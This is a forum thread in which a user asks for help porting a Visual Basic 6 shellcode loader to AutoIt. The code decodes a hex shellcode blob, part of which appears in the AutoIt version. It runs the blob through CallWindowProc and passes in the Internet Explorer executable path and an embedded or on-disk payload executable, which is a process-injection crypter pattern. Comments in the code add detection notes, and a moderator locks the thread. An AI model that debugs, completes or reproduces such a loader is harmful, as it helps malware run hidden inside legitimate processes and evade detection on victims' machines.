
Hello, I'm trying to convert my Visual Basic 6 program, which uses shellcode, to AutoIt. The shellcode works without problems in VB6. The problem comes when I try to convert the shellcode from hex to bytes: I always get either 0000000000000 or 0x00000000055, etc.

I've tried a couple of ways, but still nothing.

Here is the VB6 code:

' Binds user32!CallWindowProcW with every parameter declared As Long, so a raw
' address can be supplied in any position, including lpPrevWndFunc.
Private Declare Function CallWindowProcW Lib "user32" (ByVal lpPrevWndFunc As Long, ByVal hwnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
' Entry point: pairs a hard-coded executable path with a byte array taken from
' the program's own resources and hands both to memory().
Sub Main()
Dim procpath As String
Dim payload() As Byte
' Path of the Internet Explorer executable, passed on as memory()'s first argument.
procpath = "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
' Bytes of resource 101, type "CUSTOM", embedded in this program.
' Triage note: a custom binary resource that is read whole into a byte array and
' never written to disk is worth extracting and inspecting on its own.
payload = LoadResData(101, "CUSTOM")
Call memory(procpath, payload)
End Sub


' Decodes a hex string into a byte buffer and transfers control to that buffer
' through CallWindowProcW.
'   ruta    - string whose pointer (StrPtr) is passed in the hwnd position.
'   binario - byte array; the address of its first element is passed in the Msg position.
' Nothing is returned; the result of CallWindowProcW is discarded.
Public Sub memory(ByVal ruta As String, binario() As Byte)

' Fixed 4096-byte buffer (indices 0..4095) that receives the decoded bytes.
Dim b_ASM(4095) As Byte
Dim ShellCode As String
' NOTE(review): the hex literals assigned/appended on the next lines are absent
' from this copy of the page, so the decoded content cannot be reviewed here.
ShellCode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
ShellCode = ShellCode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
ShellCode = ShellCode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
ShellCode = ShellCode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
ShellCode = ShellCode & "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"
ShellCode = ShellCode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
ShellCode = ShellCode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



' Walks the string two characters at a time; each pair is parsed as a hex byte
' ("&H" prefix) and stored at the next index. i and K have no Dim in this Sub.
For i = 1 To Len(ShellCode) Step 2
    b_ASM(K) = CByte("&H" & Mid$(ShellCode, i, 2)): K = K + 1
Next i



' The address of b_ASM(0) is passed as lpPrevWndFunc, so user32 calls into the
' decoded byte buffer instead of a window procedure. The path string pointer and
' the address of binario(0) ride along as the next two arguments.
' Detection note: CallWindowProc invoked with a first argument that points into
' data rather than into a loaded module is a recognised in-memory execution
' indicator; combined with a path to another program's image and an embedded
' binary it presumably matches an injection-style loader and warrants triage.
CallWindowProcW VarPtr(b_ASM(0)), StrPtr(ruta), VarPtr(binario(0)), 0, 0
End Sub


 

And here is the AutoIt code:

 

#include <Memory.au3>
#include <WinAPI.au3>
#include <File.au3>

; Top-level script: sets a hard-coded executable path, reads from a second
; hard-coded file, and passes both values to memory().
Global $procpath = "C:\Program Files (x86)\Internet Explorer\iexplore.exe"
; FileRead is called on an .exe on the user's Desktop with a second argument of 1.
Global $payload = FileRead("C:\Users\Pc\Desktop\halka.exe", 1)
; Stops with a message box if FileRead set @error.
If @error Then
   MsgBox(0, "Error", "Failed to read payload file")
   Exit
EndIf

MsgBox(0, "Debug", "Payload loaded")
memory($procpath, $payload)

; Builds a hex string, stores one value per two-character slice in an array,
; then calls user32!CallWindowProc through DllCall with structure pointers.
;   $ruta    - passed to the DLL call as a "str" argument.
;   $binario - passed as the initialiser of a byte structure sized by BinaryLen.
; Shows message boxes for progress, for DllCall failure, and for the result.
Func memory($ruta, $binario)
   ; 4096-element AutoIt array that receives the converted values.
   Local $b_ASM[4096]

    ; NOTE(review): most of the hex literals below are absent from this copy of
    ; the page; only one fragment survives, so the content cannot be reviewed in full.
    Local $ShellCode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
    $ShellCode &= "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"
    $ShellCode &= "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"
    $ShellCode &= "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"
    $ShellCode &= "00000031ED8B7424088B5C241885D20F848D030000896C242431EDEB0A904539D50F84C40200008B4424148B1CA80FB6040B84C074E801CB43BE051500000FBEC089F7C1E70501FE01C60FB6034384C075EC81FE4E96207E75C48B04240FB704688B7424208B048601C80F847B0200008944241C8038E98B4424048B7424088B5C24188B6C24240F85760200008B7C241C8B470101C783C705897C241C8B442404E95D02000031D2E9D0FDFFFF31F685D20F8549FDFFFF31D2C744240C0000000031DB31EDC70424000000008B4424048B4C241085C00F840402000085C90F84FC01000085F60F84F401000085DB0F84EC010000837C240C000F84E10"
    $ShellCode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
    $ShellCode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
    


      ; Index of the next array element to fill; also the element count afterwards.
      Local $K = 0

   ; Steps through the string two characters at a time; each slice is prefixed
   ; with "0x", passed to Dec, and the result stored at index $K.
   For $i = 1 To StringLen($ShellCode) Step 2
       $b_ASM[$K] = Dec("0x" & StringMid($ShellCode, $i, 2))
       $K += 1
   Next

   MsgBox(0, "Debug", "Shellcode converted")

  
   ; Displays the first four array elements in hex.
   MsgBox(0, "Debug", "First bytes: 0x" & Hex($b_ASM[0]) & " " & Hex($b_ASM[1]) & " " & Hex($b_ASM[2]) & " " & Hex($b_ASM[3]))

   ; Calls CallWindowProc in user32.dll with a structure pointer in the window
   ; procedure position, followed by the path string and a second structure pointer.
   ; Detection note: a script host or AutoIt-compiled binary that reaches
   ; CallWindowProc via DllCall with a data pointer as the first argument, next to
   ; a long hex blob and a path to another program's image, is a recognised
   ; in-memory execution pattern and worth triaging.
   Local $result = DllCall("user32.dll", "ptr", "CallWindowProc", _
       "ptr", DllStructGetPtr(DllStructCreate("byte[" & $K & "]", $b_ASM)), _
       "str", $ruta, _
       "ptr", DllStructGetPtr(DllStructCreate("byte[" & BinaryLen($binario) & "]", $binario)), _
       "int", 0, _
       "int", 0)

   ; Reports either the DllCall error code or the return value. The pointers shown
   ; in the success box come from new DllStructCreate calls made for display.
   If @error Then
       MsgBox(0, "Error", "DllCall failed: " & @error)
   Else
       MsgBox(0, "Success", "Return value: 0x" & Hex($result[0]) & @CRLF & _
           "ASM ptr: 0x" & Hex(DllStructGetPtr(DllStructCreate("byte[" & $K & "]", $b_ASM))) & @CRLF & _
           "Binario ptr: 0x" & Hex(DllStructGetPtr(DllStructCreate("byte[" & BinaryLen($binario) & "]", $binario))))
   EndIf
EndFunc


And these are the results of the conversion:



 

2.png

  • Developers
Posted (edited)

Nah...   i prefer a serious reply, so can only assume i am right.

Please read our forum rules before posting again.

 

Edited by Jos

 
Live for the present,
Dream of the future,
Learn from the past.
  :)

  • Jos locked this topic